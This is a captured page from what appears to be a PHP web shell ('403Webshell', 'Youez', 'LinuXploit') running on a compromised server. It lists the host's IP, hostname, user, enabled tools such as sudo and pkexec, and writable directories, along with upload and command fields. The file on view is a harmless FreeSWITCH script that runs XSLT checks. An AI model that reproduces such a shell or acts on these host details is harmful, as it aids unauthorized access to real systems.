403Webshell
Server IP : 189.126.111.107  /  Your IP : 216.73.217.69
Web Server : Apache
System : Linux www.gadotticar.com.br 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64
User : gadotticar ( 1000)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/src/freeswitch-1.10.12/docs/phrase/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/src/freeswitch-1.10.12/docs/phrase/make_checks.sh
#!/bin/sh
SAXON_JAR=/usr/share/java/saxon9he.jar
XML=$1

if  [ ! -f "$SAXON_JAR" ]; then
	echo "Please update 'SAXON_JAR' variable value to location of SAXON jar"
	exit -1
fi

if [ -z "$XML" ]; then
	echo "Error: Please enter xml file name that must be ckecked."
	echo "Example: make_checks.sh phrase_es_ES.xml > comparison_result.xml"
	exit -1
fi

java -jar "$SAXON_JAR" -xsl:make_checks.xslt -t "$XML"


Youez - 2016 - github.com/yon3zu
LinuXploit